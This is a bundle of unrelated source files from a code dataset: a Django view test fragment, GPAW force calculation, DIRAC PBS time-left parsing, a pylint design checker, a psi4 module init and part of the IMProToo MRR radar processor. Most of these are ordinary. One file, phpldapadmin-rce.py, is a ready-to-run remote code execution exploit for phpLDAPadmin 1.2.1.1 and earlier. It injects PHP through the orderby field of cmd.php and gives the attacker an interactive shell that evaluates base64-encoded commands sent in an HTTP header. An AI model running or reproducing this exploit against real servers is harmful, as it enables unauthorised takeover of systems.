object = Author.objects.defer('name').get(pk=self.author1.pk)
fields = ('name',)
form_context_data = FormContext().get_context_data()
self.assertEqual(form_context_data['object'], self.author1)
self.assertEqual(form_context_data['author'], self.author1)
def test_invalid_url(self):
self.assertRaises(AttributeError, self.client.get, '/detail/author/invalid/url/')
def test_invalid_queryset(self):
self.assertRaises(ImproperlyConfigured, self.client.get, '/detail/author/invalid/qs/')
def test_non_model_object_with_meta(self):
res = self.client.get('/detail/nonmodel/1/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'].id, "non_model_1")
|
DONIKAN/django
|
tests/generic_views/test_detail.py
|
Python
|
bsd-3-clause
| 8,387
|
[
"MOOSE"
] |
fbdd12a347395cccccf14f0ae04331101789f39f2536a95c03e0792bf3728373
|
import numpy as np
from gpaw.xc.hybrid import HybridXCBase
class ForceCalculator:
def __init__(self, timer):
self.timer = timer
self.reset()
def reset(self):
self.F_av = None
def calculate(self, wfs, dens, ham):
"""Return the atomic forces."""
assert not isinstance(ham.xc, HybridXCBase)
if self.F_av is not None:
return self.F_av
self.timer.start('Force calculation')
natoms = len(wfs.setups)
self.F_av = np.zeros((natoms, 3))
# Force from projector functions (and basis set):
wfs.calculate_forces(ham, self.F_av)
try:
# ODD functionals need force corrections for each spin
correction = ham.xc.setup_force_corrections
except AttributeError:
pass
else:
correction(self.F_av)
if wfs.bd.comm.rank == 0 and wfs.kd.comm.rank == 0:
ham.calculate_forces(dens, self.F_av)
wfs.world.broadcast(self.F_av, 0)
self.F_av = wfs.symmetry.symmetrize_forces(self.F_av)
self.timer.stop('Force calculation')
return self.F_av
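# Minimal usage sketch (hypothetical; timer, wfs, dens and ham would be
# provided by a GPAW calculator's internals):
#   fc = ForceCalculator(timer)
#   F_av = fc.calculate(wfs, dens, ham)  # -> (natoms, 3) array of forces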
|
robwarm/gpaw-symm
|
gpaw/forces.py
|
Python
|
gpl-3.0
| 1,191
|
[
"GPAW"
] |
a2f48171fb47f71df4af1c8121dddf0a74fabc5b2ef012f493905f4affbf1527
|
""" The PBS TimeLeft utility interrogates the PBS batch system for the
current CPU and Wallclock consumed, as well as their limits.
"""
__RCSID__ = "$Id$"
import os
import re
import time
from DIRAC import gLogger, S_OK, S_ERROR
from DIRAC.Core.Utilities.TimeLeft.TimeLeft import runCommand
class PBSTimeLeft( object ):
#############################################################################
def __init__( self ):
""" Standard constructor
"""
self.log = gLogger.getSubLogger( 'PBSTimeLeft' )
self.jobID = os.environ.get( 'PBS_JOBID' )
self.queue = os.environ.get( 'PBS_O_QUEUE' )
pbsPath = os.environ.get( 'PBS_O_PATH' )
if pbsPath:
os.environ['PATH'] += ':' + pbsPath
self.cpuLimit = None
self.wallClockLimit = None
self.log.verbose( 'PBS_JOBID=%s, PBS_O_QUEUE=%s' % ( self.jobID, self.queue ) )
self.startTime = time.time()
#############################################################################
def getResourceUsage( self ):
"""Returns a dictionary containing CPUConsumed, CPULimit, WallClockConsumed
and WallClockLimit for current slot. All values returned in seconds.
"""
cmd = 'qstat -f %s' % ( self.jobID )
result = runCommand( cmd )
if not result['OK']:
return result
cpu = None
cpuLimit = None
wallClock = None
wallClockLimit = None
lines = str( result['Value'] ).split( '\n' )
for line in lines:
info = line.split()
if re.search( '.*resources_used.cput.*', line ):
if len( info ) >= 3:
cpuList = info[2].split( ':' )
newcpu = ( float( cpuList[0] ) * 60 + float( cpuList[1] ) ) * 60 + float( cpuList[2] )
if not cpu or newcpu > cpu:
cpu = newcpu
else:
self.log.warn( 'Problem parsing "%s" for CPU consumed' % line )
if re.search( '.*resources_used.pcput.*', line ):
if len( info ) >= 3:
cpuList = info[2].split( ':' )
newcpu = ( float( cpuList[0] ) * 60 + float( cpuList[1] ) ) * 60 + float( cpuList[2] )
if not cpu or newcpu > cpu:
cpu = newcpu
else:
self.log.warn( 'Problem parsing "%s" for CPU consumed' % line )
if re.search( '.*resources_used.walltime.*', line ):
if len( info ) >= 3:
wcList = info[2].split( ':' )
wallClock = ( float( wcList[0] ) * 60 + float( wcList[1] ) ) * 60 + float( wcList[2] )
else:
self.log.warn( 'Problem parsing "%s" for elapsed wall clock time' % line )
if re.search( '.*Resource_List.cput.*', line ):
if len( info ) >= 3:
cpuList = info[2].split( ':' )
newcpuLimit = ( float( cpuList[0] ) * 60 + float( cpuList[1] ) ) * 60 + float( cpuList[2] )
if not cpuLimit or newcpuLimit < cpuLimit:
cpuLimit = newcpuLimit
else:
self.log.warn( 'Problem parsing "%s" for CPU limit' % line )
if re.search( '.*Resource_List.pcput.*', line ):
if len( info ) >= 3:
cpuList = info[2].split( ':' )
newcpuLimit = ( float( cpuList[0] ) * 60 + float( cpuList[1] ) ) * 60 + float( cpuList[2] )
if not cpuLimit or newcpuLimit < cpuLimit:
cpuLimit = newcpuLimit
else:
self.log.warn( 'Problem parsing "%s" for CPU limit' % line )
if re.search( '.*Resource_List.walltime.*', line ):
if len( info ) >= 3:
wcList = info[2].split( ':' )
wallClockLimit = ( float( wcList[0] ) * 60 + float( wcList[1] ) ) * 60 + float( wcList[2] )
else:
self.log.warn( 'Problem parsing "%s" for wall clock limit' % line )
consumed = {'CPU':cpu, 'CPULimit':cpuLimit, 'WallClock':wallClock, 'WallClockLimit':wallClockLimit}
self.log.debug( consumed )
if None not in consumed.values():
self.log.debug( "TimeLeft counters complete:", str( consumed ) )
return S_OK( consumed )
else:
missed = [key for key, val in consumed.items() if val is None]
self.log.info( 'Could not determine parameter', ','.join( missed ) )
self.log.debug( 'This is the stdout from the batch system call\n%s' % ( result['Value'] ) )
if cpuLimit or wallClockLimit:
          # We only got a partial result from PBS; assume the job has not been running long
if not cpuLimit:
consumed['CPULimit'] = wallClockLimit * 0.8
if not wallClockLimit:
consumed['WallClockLimit'] = cpuLimit / 0.8
if not cpu:
consumed['CPU'] = int( time.time() - self.startTime )
if not wallClock:
consumed['WallClock'] = int( time.time() - self.startTime )
self.log.debug( "TimeLeft counters restored:", str( consumed ) )
return S_OK( consumed )
else:
msg = 'Could not determine some parameters'
self.log.info( msg, ':\nThis is the stdout from the batch system call\n%s' % ( result['Value'] ) )
retVal = S_ERROR( msg )
retVal['Value'] = consumed
return retVal
# EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#
|
andresailer/DIRAC
|
Core/Utilities/TimeLeft/PBSTimeLeft.py
|
Python
|
gpl-3.0
| 5,069
|
[
"DIRAC"
] |
8358b44c587217198c9518e6f5a907f0b4af1cd2356ddd50521baab2cc30056e
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2019 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""
Module findif_response_utils
Defines functions that are shared between ccresponse drivers for
computing properties using an embarrassingly parallel finite differences
approach.
New drivers should be added to the registered_props dict in
db_helper.py
"""
from .db_helper import *
from .data_collection_helper import *
|
CDSherrill/psi4
|
psi4/driver/procrouting/findif_response_utils/__init__.py
|
Python
|
lgpl-3.0
| 1,235
|
[
"Psi4"
] |
a008fbef94b135de42b3bd8297ce102073a5e3940bbdb3760bd678e42585eb0d
|
# Copyright (c) 2003-2012 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ -- mailto:contact@logilab.fr
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""check for signs of poor design
see http://intranet.logilab.fr/jpl/view?rql=Any%20X%20where%20X%20eid%201243
FIXME: missing 13, 15, 16
"""
from logilab.astng import Function, If, InferenceError
from pylint.interfaces import IASTNGChecker
from pylint.checkers import BaseChecker
import re
# regexp for ignored argument name
IGNORED_ARGUMENT_NAMES = re.compile('_.*')
SPECIAL_METHODS = [('Context manager', set(('__enter__',
'__exit__',))),
('Container', set(('__len__',
'__getitem__',
'__setitem__',
'__delitem__',))),
('Callable', set(('__call__',))),
]
class SpecialMethodChecker(object):
"""A functor that checks for consistency of a set of special methods"""
def __init__(self, methods_found, on_error):
"""Stores the set of __x__ method names that were found in the
        class and a callable that will be called with args to R0924 if
the check fails
"""
self.methods_found = methods_found
self.on_error = on_error
def __call__(self, methods_required, protocol):
"""Checks the set of method names given to __init__ against the set
required.
If they are all present, returns true.
If they are all absent, returns false.
If some are present, reports the error and returns false.
"""
required_methods_found = methods_required & self.methods_found
if required_methods_found == methods_required:
return True
if required_methods_found != set():
required_methods_missing = methods_required - self.methods_found
self.on_error((protocol,
', '.join(sorted(required_methods_found)),
', '.join(sorted(required_methods_missing))))
return False
def class_is_abstract(klass):
"""return true if the given class node should be considered as an abstract
class
"""
for attr in klass.values():
if isinstance(attr, Function):
if attr.is_abstract(pass_is_abstract=False):
return True
return False
MSGS = {
'R0901': ('Too many ancestors (%s/%s)',
'too-many-ancestors',
'Used when class has too many parent classes, try to reduce \
this to get a more simple (and so easier to use) class.'),
'R0902': ('Too many instance attributes (%s/%s)',
'too-many-instance-attributes',
'Used when class has too many instance attributes, try to reduce \
this to get a more simple (and so easier to use) class.'),
'R0903': ('Too few public methods (%s/%s)',
'too-few-public-methods',
'Used when class has too few public methods, so be sure it\'s \
really worth it.'),
'R0904': ('Too many public methods (%s/%s)',
'too-many-public-methods',
'Used when class has too many public methods, try to reduce \
this to get a more simple (and so easier to use) class.'),
'R0911': ('Too many return statements (%s/%s)',
'too-many-return-statements',
'Used when a function or method has too many return statement, \
making it hard to follow.'),
'R0912': ('Too many branches (%s/%s)',
'too-many-branches',
'Used when a function or method has too many branches, \
making it hard to follow.'),
'R0913': ('Too many arguments (%s/%s)',
'too-many-arguments',
'Used when a function or method takes too many arguments.'),
'R0914': ('Too many local variables (%s/%s)',
'too-many-locals',
'Used when a function or method has too many local variables.'),
'R0915': ('Too many statements (%s/%s)',
'too-many-statements',
'Used when a function or method has too many statements. You \
should then split it in smaller functions / methods.'),
'R0921': ('Abstract class not referenced',
'abstract-class-not-used',
'Used when an abstract class is not used as ancestor anywhere.'),
'R0922': ('Abstract class is only referenced %s times',
'abstract-class-little-used',
'Used when an abstract class is used less than X times as \
ancestor.'),
'R0923': ('Interface not implemented',
'interface-not-implemented',
'Used when an interface class is not implemented anywhere.'),
'R0924': ('Badly implemented %s, implements %s but not %s',
'incomplete-protocol',
'A class implements some of the special methods for a particular \
protocol, but not all of them')
}
class MisdesignChecker(BaseChecker):
"""checks for sign of poor/misdesign:
* number of methods, attributes, local variables...
* size, complexity of functions, methods
"""
__implements__ = (IASTNGChecker,)
# configuration section name
name = 'design'
# messages
msgs = MSGS
priority = -2
# configuration options
options = (('max-args',
{'default' : 5, 'type' : 'int', 'metavar' : '<int>',
'help': 'Maximum number of arguments for function / method'}
),
('ignored-argument-names',
{'default' : IGNORED_ARGUMENT_NAMES,
'type' :'regexp', 'metavar' : '<regexp>',
'help' : 'Argument names that match this expression will be '
'ignored. Default to name with leading underscore'}
),
('max-locals',
{'default' : 15, 'type' : 'int', 'metavar' : '<int>',
'help': 'Maximum number of locals for function / method body'}
),
('max-returns',
{'default' : 6, 'type' : 'int', 'metavar' : '<int>',
'help': 'Maximum number of return / yield for function / '
'method body'}
),
('max-branchs',
{'default' : 12, 'type' : 'int', 'metavar' : '<int>',
'help': 'Maximum number of branch for function / method body'}
),
('max-statements',
{'default' : 50, 'type' : 'int', 'metavar' : '<int>',
'help': 'Maximum number of statements in function / method '
'body'}
),
('max-parents',
{'default' : 7,
'type' : 'int',
'metavar' : '<num>',
'help' : 'Maximum number of parents for a class (see R0901).'}
),
('max-attributes',
{'default' : 7,
'type' : 'int',
'metavar' : '<num>',
'help' : 'Maximum number of attributes for a class \
(see R0902).'}
),
('min-public-methods',
{'default' : 2,
'type' : 'int',
'metavar' : '<num>',
'help' : 'Minimum number of public methods for a class \
(see R0903).'}
),
('max-public-methods',
{'default' : 20,
'type' : 'int',
'metavar' : '<num>',
'help' : 'Maximum number of public methods for a class \
(see R0904).'}
),
)
def __init__(self, linter=None):
BaseChecker.__init__(self, linter)
self.stats = None
self._returns = None
self._branchs = None
self._used_abstracts = None
self._used_ifaces = None
self._abstracts = None
self._ifaces = None
self._stmts = 0
def open(self):
"""initialize visit variables"""
self.stats = self.linter.add_stats()
self._returns = []
self._branchs = []
self._used_abstracts = {}
self._used_ifaces = {}
self._abstracts = []
self._ifaces = []
def close(self):
"""check that abstract/interface classes are used"""
for abstract in self._abstracts:
if not abstract in self._used_abstracts:
self.add_message('R0921', node=abstract)
elif self._used_abstracts[abstract] < 2:
self.add_message('R0922', node=abstract,
args=self._used_abstracts[abstract])
for iface in self._ifaces:
if not iface in self._used_ifaces:
self.add_message('R0923', node=iface)
def visit_class(self, node):
"""check size of inheritance hierarchy and number of instance attributes
"""
self._inc_branch()
        # Is the total inheritance hierarchy 7 or less?
nb_parents = len(list(node.ancestors()))
if nb_parents > self.config.max_parents:
self.add_message('R0901', node=node,
args=(nb_parents, self.config.max_parents))
# Does the class contain less than 20 attributes for
# non-GUI classes (40 for GUI)?
# FIXME detect gui classes
if len(node.instance_attrs) > self.config.max_attributes:
self.add_message('R0902', node=node,
args=(len(node.instance_attrs),
self.config.max_attributes))
# update abstract / interface classes structures
if class_is_abstract(node):
self._abstracts.append(node)
elif node.type == 'interface' and node.name != 'Interface':
self._ifaces.append(node)
for parent in node.ancestors(False):
if parent.name == 'Interface':
continue
self._used_ifaces[parent] = 1
try:
for iface in node.interfaces():
self._used_ifaces[iface] = 1
except InferenceError:
# XXX log ?
pass
for parent in node.ancestors():
try:
self._used_abstracts[parent] += 1
except KeyError:
self._used_abstracts[parent] = 1
def leave_class(self, node):
"""check number of public methods"""
nb_public_methods = 0
special_methods = set()
for method in node.methods():
if not method.name.startswith('_'):
nb_public_methods += 1
if method.name.startswith("__"):
special_methods.add(method.name)
# Does the class contain less than 20 public methods ?
if nb_public_methods > self.config.max_public_methods:
self.add_message('R0904', node=node,
args=(nb_public_methods,
self.config.max_public_methods))
# stop here for exception, metaclass and interface classes
if node.type != 'class':
return
        # Does the class implement special methods consistently?
# If so, don't enforce minimum public methods.
check_special = SpecialMethodChecker(
special_methods, lambda args: self.add_message('R0924', node=node, args=args))
protocols = [check_special(pmethods, pname) for pname, pmethods in SPECIAL_METHODS]
if True in protocols:
return
        # Does the class have at least the minimum number of public methods?
if nb_public_methods < self.config.min_public_methods:
self.add_message('R0903', node=node,
args=(nb_public_methods,
self.config.min_public_methods))
def visit_function(self, node):
"""check function name, docstring, arguments, redefinition,
variable names, max locals
"""
self._inc_branch()
# init branch and returns counters
self._returns.append(0)
self._branchs.append(0)
# check number of arguments
args = node.args.args
if args is not None:
ignored_args_num = len(
[arg for arg in args
if self.config.ignored_argument_names.match(arg.name)])
argnum = len(args) - ignored_args_num
if argnum > self.config.max_args:
self.add_message('R0913', node=node,
args=(len(args), self.config.max_args))
else:
ignored_args_num = 0
# check number of local variables
locnum = len(node.locals) - ignored_args_num
if locnum > self.config.max_locals:
self.add_message('R0914', node=node,
args=(locnum, self.config.max_locals))
# init statements counter
self._stmts = 1
def leave_function(self, node):
"""most of the work is done here on close:
checks for max returns, branch, return in __init__
"""
returns = self._returns.pop()
if returns > self.config.max_returns:
self.add_message('R0911', node=node,
args=(returns, self.config.max_returns))
branchs = self._branchs.pop()
if branchs > self.config.max_branchs:
self.add_message('R0912', node=node,
args=(branchs, self.config.max_branchs))
# check number of statements
if self._stmts > self.config.max_statements:
self.add_message('R0915', node=node,
args=(self._stmts, self.config.max_statements))
def visit_return(self, _):
"""count number of returns"""
if not self._returns:
return # return outside function, reported by the base checker
self._returns[-1] += 1
def visit_default(self, node):
"""default visit method -> increments the statements counter if
necessary
"""
if node.is_statement:
self._stmts += 1
def visit_tryexcept(self, node):
"""increments the branchs counter"""
branchs = len(node.handlers)
if node.orelse:
branchs += 1
self._inc_branch(branchs)
self._stmts += branchs
def visit_tryfinally(self, _):
"""increments the branchs counter"""
self._inc_branch(2)
self._stmts += 2
def visit_if(self, node):
"""increments the branchs counter"""
branchs = 1
# don't double count If nodes coming from some 'elif'
if node.orelse and (len(node.orelse)>1 or
not isinstance(node.orelse[0], If)):
branchs += 1
self._inc_branch(branchs)
self._stmts += branchs
def visit_while(self, node):
"""increments the branchs counter"""
branchs = 1
if node.orelse:
branchs += 1
self._inc_branch(branchs)
visit_for = visit_while
def _inc_branch(self, branchsnum=1):
"""increments the branchs counter"""
branchs = self._branchs
for i in xrange(len(branchs)):
branchs[i] += branchsnum
# FIXME: make a nice report...
def register(linter):
"""required method to auto register this checker """
linter.register_checker(MisdesignChecker(linter))
|
hpfem/agros2d
|
resources/python/pylint/checkers/design_analysis.py
|
Python
|
gpl-2.0
| 16,303
|
[
"VisIt"
] |
1330aab6dfee76d076f73bda05e814c2974abff1526bd025b675013ba3e9bb6e
|
#!/usr/bin/python
import re
import sys
import httplib
import getpass
import base64
def get_session_id(host,path):
req = httplib.HTTPConnection(host)
# write header
req.putrequest("GET",path+"index.php")
req.putheader("Host",host)
req.putheader("Connection","close")
req.endheaders()
res = req.getresponse()
if not res.getheader('set-cookie').split(';')[0]:
return "[-] Session ID not found!"
return res.getheader('set-cookie').split(';')[0]
# Launch exploit
def exploit(host,path,cmd):
req = httplib.HTTPConnection(host)
# write header
req.putrequest("POST", path+"cmd.php")
req.putheader("Cookie", session)
req.putheader("Cmd", cmd)
req.putheader("Content-Length", str(len(payload)))
req.putheader("Content-Type", "application/x-www-form-urlencoded")
req.putheader("Connection","close")
req.endheaders()
req.send(payload)
res = req.getresponse()
data = res.read().split('\n')
result = []
for line in data:
if not re.search("<br />", line) and not re.search('<b>Warning</b>:', line):
line = line.replace("_code_","")
result.append(line)
result = '\n'.join(result)
return result
print '''
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|| ||
|| phpLDAPadmin <= 1.2.1.1 Remote PHP Code Injection Exploit ||
|| Original discovery/poc: EgiX <n0b0d13s[at]gmail-com> ||
|| Written by Krit Kadnok < c1ph3r@blackbuntu.com > ||
|| Affected versions....: from 1.2.0 to 1.2.1.1 ||
|| References: http://sourceforge.net/support/tracker.php?aid=3417184 ||
|| http://www.exploit-db.com/exploits/18021/ ||
|| Visit: www.blackbuntu.com ||
|| ||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
'''
if len(sys.argv) != 3:
print "Usage: python",sys.argv[0],"<host> <path>"
print "Example: python",sys.argv[0],"localhost /"
print "Example: python",sys.argv[0],"localhost /phpldapadmin/htdocs/"
sys.exit(1)
host = sys.argv[1]
path = sys.argv[2]
#phpcode = "foo));}}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;/*";
phpcode = "foo));}}error_reporting(0);print(_code_);eval(base64_decode($_SERVER[HTTP_CMD]));die;/*";
payload = "cmd=query_engine&query=none&search=1&orderby=%s" % phpcode;
session = get_session_id(host,path)
while 1:
cmd = raw_input("\n%s@%s~$ " % (getpass.getuser(),host))
if cmd != "exit":
cmd = base64.b64encode(cmd)
data = exploit(host,path,cmd)
print data
else:
sys.exit(1)
|
c1ph3r/VA-Scripts
|
phpldapadmin-rce.py
|
Python
|
gpl-2.0
| 2,887
|
[
"VisIt"
] |
db884ed7c623e8395cfeee8856cec63ab6bb0ce6dde646bea7c7cf699043c911
|
# -*- coding: utf-8 -*-
'''
IMProToo
Improved MRR Processing Tool
Python toolkit to read, write and process MRR Data. Raw Data, Average and
Instantaneous Data are supported.
Copyright (C) 2011-2021 Maximilian Maahn, U Leipzig
maximilian.maahn_AT_uni-leipzig.de
https://github.com/maahn/IMProToo
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from __future__ import division
from __future__ import print_function
import numpy as np
import gzip
import re
import datetime
import calendar
import time
import glob
from copy import deepcopy
import warnings
import sys
import os
import codecs
from .tools import unix2date, date2unix, limitMaInidces, quantile
from .tools import oneD2twoD, _get_netCDF_module
try:
from importlib.metadata import version, PackageNotFoundError
py3 = True
except ImportError:
from pkg_resources import get_distribution, DistributionNotFound
py3 = False
if py3:
try:
__version__ = version("IMProToo")
except PackageNotFoundError:
# package is not installed
pass
else:
try:
__version__ = get_distribution("IMProToo").version
except DistributionNotFound:
# package is not installed
pass
class MrrZe:
'''
class to calculate the 'real' MRR Ze from MRR raw data. The spectra are
noise corrected and dealiased. see batch_convert_rawData.py for
exemplary use
'''
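    # Minimal usage sketch (assuming the companion mrrRawData reader of this
    # package; the file name is hypothetical):
    #   raw = IMProToo.mrrRawData('mrr_raw_file.mrr.gz')
    #   processor = IMProToo.MrrZe(raw)
    #   processor.averageSpectra(60)
    #   processor.rawToSnow()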
warnings.filterwarnings('always', '.*', UserWarning,)
def __init__(self, rawData):
if rawData.mrrRawCC == 0:
print('WARNING: MRR calibration constant set to 0!')
self.co = dict()
# verbosity
self.co["debug"] = 0
# ######MRR Settings#######
# mrr frequency, MRR after 2011 (or upgraded) use 24.23e9
self.co["mrrFrequency"] = 24.15e9 # in Hz,
# wavelength in m
self.co["lamb"] = 299792458. / self.co["mrrFrequency"]
# mrr calibration constant
self.co["mrrCalibConst"] = rawData.mrrRawCC
# do not change these values, unless you have a non standard MRR!
# nyquist range minimum
self.co["nyqVmin"] = 0
# nyquist range maximum
self.co["nyqVmax"] = 11.9301147
# nyquist delta
self.co["nyqVdelta"] = 0.1893669
# list with nyquist velocities
self.co["nyqVel"] = np.arange(
self.co["nyqVmin"],
self.co["nyqVmax"]+0.0001,
self.co["nyqVdelta"]
)
# spectral resolution
self.co["widthSpectrum"] = 64
# min height to be processed
self.co["minH"] = 1 # start counting at 0
# max height to be processed
self.co["maxH"] = 31 # start counting at 0
# no of processed heights
self.co["noH"] = self.co["maxH"]+1 - self.co["minH"]
# shape of spectrum for one time step
self.co["specShape"] = (self.co["noH"], self.co["widthSpectrum"],)
# input data MRR averaging time
self.co["averagingTime"] = 10
# |K**2| dielectric constant
self.co["K2"] = 0.92
# ######options for finding peaks#######
# minimum width of a peak. if set to 4 instead of 3, more clutter is
# removed, but sensitivity becomes worse.
self.co["findPeak_minPeakWidth"] = 3
# minimum standard deviation of of spectrum for peak
# self.co["findPeak_minStdPerS"]/np.sqrt(self.co["averagingTime"])
self.co["findPeak_minStdPerS"] = 0.6
# minimum difference of Doppler velocity from self.co["nyqVmax"]/2 for
# peak
self.co["findPeak_minWdiff"] = 0.2
# ######options for getting peaks#######
# method for finding peaks in the spectrum, either based on Hildebrand
# and Sekhon, 1974 [hilde] or on the method of descending average
# [descAve]. [hilde] is recommended
self.co["getPeak_method"] = "hilde" # ["hilde","descAve"]
# sometimes the first method fails and almost the whole spectrum is
# found as a peak, so apply a second check based on the remaining
# method from [hilde,descAve]
self.co["getPeak_makeDoubleCheck"] = True
        # apply the double check to peaks wider than this fraction of the
        # spectrum width. Wider real peaks can actually happen! These are
        # usually bimodal peaks; the descending average method fails for
        # them, thus the spectrum is checked again with the other method.
self.co["getPeak_makeDoubleCheck_minPeakWidth"] = 0.9
# hilde method uses an extra buffer to avoid to large peaks. loop stops
# first at spectrum >= self.co["getPeak_hildeExtraLimit"]*hilde_limit,
# only one more bin is added if above self.co[
# "getPeak_hildeExtraLimit"]. More bins above self.co[
# "getPeak_hildeExtraLimit"] are ignored
self.co["getPeak_hildeExtraLimit"] = 1.2 # times hildebrand limit
# options for descAve method
# window to calculate the average, if too large, it might go into the
# next peak! if too small, it might not catch bimodal distributions
self.co["getPeak_descAveCheckWidth"] = 10
# descAve stops not before mean is smaller than self.co[
# "getPeak_descAveMinMeanWeight"] of the mean of the self.co[
# "getPeak_descAveCheckWidth"] smallest bins. make very big to turn off
self.co["getPeak_descAveMinMeanWeight"] = 4
# ####options for confirming peaks ##########
# check whether time/height neighbors of a peak contain a peak as well
self.co["confirmPeak_5x5boxCoherenceTest"] = True
# maximum of other peaks must be within X Doppler-bins of the maximum
# of the tested peak
self.co["confirmPeak_5x5boxCoherenceTest_maxBinDistane"] = 10
# ######general options#######
# process only peaks in self.co["spectrumBorderMin"][height]:
# self.co["spectrumBorderMax"][height]
self.co["spectrumBorderMin"] = [5, 4, 3, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 5]
self.co["spectrumBorderMax"] = [60, 61, 62, 63, 63, 63, 63, 63, 63,
63, 63, 63, 63, 63, 63, 63, 63, 63,
63, 63, 63, 63, 63, 63, 63, 63, 63,
63, 62, 61, 63]
# interpolate spectrum in between
self.co["interpolateSpectrum"] = True
# extend also peaks to interpolated part
self.co["fillInterpolatedPeakGaps"] = True
# mask everything in these heights, since they are disturbed
self.co["completelyMaskedHeights"] = [0, 1, 30]
        # first height with trustworthy peaks. Setting important for dealiasing
        # to avoid folding from completelyMaskedHeights into the first used
# height.
self.co["firstUsedHeight"] = 2
# ######dealiasing options#######
# dealiase spectrum yes/no
self.co["dealiaseSpectrum"] = True
# save also non dealiased eta, Ze, W, Znoise specWidth,
# peakVelLeftBorder, peakVelRightBorder
self.co["dealiaseSpectrum_saveAlsoNonDealiased"] = True
# make sure there is only one peak per height after dealiasing!
self.co["dealiaseSpectrum_maxOnePeakPerHeight"] = True
# dealiasing is based on comparison with reference velocity calculated
# from reflectivity. v = A*Ze**B
# Atlas et al. 1973
self.co['dealiaseSpectrum_Ze-vRelationSnowA'] = 0.817
# Atlas et al. 1973
self.co['dealiaseSpectrum_Ze-vRelationSnowB'] = 0.063
# Atlas et al. 1973
self.co['dealiaseSpectrum_Ze-vRelationRainA'] = 2.6
# Atlas et al. 1973
self.co['dealiaseSpectrum_Ze-vRelationRainB'] = 0.107
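        # Example (hypothetical): for rain with Ze = 100 mm^6 m^-3 (20 dBZ)
        # the reference fall velocity is v = 2.6 * 100**0.107 ~ 4.3 m s^-1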
# trusted peak needs minimal Ze
self.co['dealiaseSpectrum_trustedPeakminZeQuantile'] = 0.1
# if you have interference, you don't want to start you dealiasing
# procedure there
self.co["dealiaseSpectrum_heightsWithInterference"] = []
# test coherence of dealiasesd velocity spectrum in time dimension.
# try to refold short jumps.
self.co["dealiaseSpectrum_makeCoherenceTest"] = True
# if the height averaged velocity between to timesteps is larger than
# this, it is tried to refold the spectrum
self.co["dealiaseSpectrum_makeCoherenceTest_velocityThreshold"] = 8
# if there are after coherence test still velocity jumps, mask
# +/- timesteps
self.co["dealiaseSpectrum_makeCoherenceTest_maskRadius"] = 10
# ######netCDF options#######
self.co["ncCreator"] = "IMProToo user"
self.co["ncDescription"] = "MRR data processed with IMProToo"
self.co["ncLocation"] = ""
self.co["ncInstitution"] = ""
# ######end of settings#######
        # special option to stop processing in the middle and return results
self.debugStopper = 0
self.missingNumber = -9999.
self.header = rawData.header
self.time = rawData.mrrRawTime
self.timezone = rawData.timezone
self.H = rawData.mrrRawHeight[:, self.co["minH"]:self.co["maxH"]+1]
self.TF = rawData.mrrRawTF[:, self.co["minH"]:self.co["maxH"]+1]
self.rawSpectrum = rawData.mrrRawSpectrum[
:, self.co["minH"]:self.co["maxH"]+1
]
self.noSpecPerTimestep = rawData.mrrRawNoSpec
self.no_h = np.shape(self.H)[1]
self.no_t = np.shape(self.time)[0]
self.no_v = self.co["widthSpectrum"]
self._shape2D = np.shape(self.H)
self._shape3D = np.shape(self.rawSpectrum)
self.qual = dict()
return
def averageSpectra(self, averagingTime):
"""
average spectra and other data. If averaging time is e.g. 60, the
data with the timestamp 14:00 contains all measurements from 13:59:00
to 13:59:59 (like MRR standard software)
"""
rawSpectra = self.rawSpectrum
rawTimestamps = self.time
heights = self.H
TFs = self.TF
noSpec = self.noSpecPerTimestep
# find first entry
startSeconds = unix2date(rawTimestamps[0]).second
start = rawTimestamps[0] + averagingTime - startSeconds
# find last minute
endSeconds = unix2date(rawTimestamps[-1]).second
end = rawTimestamps[-1] + 60 - endSeconds
# make new time vector and
rawTimestampsAve = np.ma.arange(
start, end+averagingTime, averagingTime, dtype="int")
# create new arrays
newSpectraShape = list(rawSpectra.shape)
newSpectraShape[0] = rawTimestampsAve.shape[0]
rawSpectraAve = np.ma.zeros(newSpectraShape) * np.nan
newTFsShape = list(TFs.shape)
newTFsShape[0] = rawTimestampsAve.shape[0]
TFsAve = np.ma.zeros(newTFsShape) * np.nan
newHeightsShape = list(heights.shape)
newHeightsShape[0] = rawTimestampsAve.shape[0]
heightsAve = np.ma.zeros(newHeightsShape) * np.nan
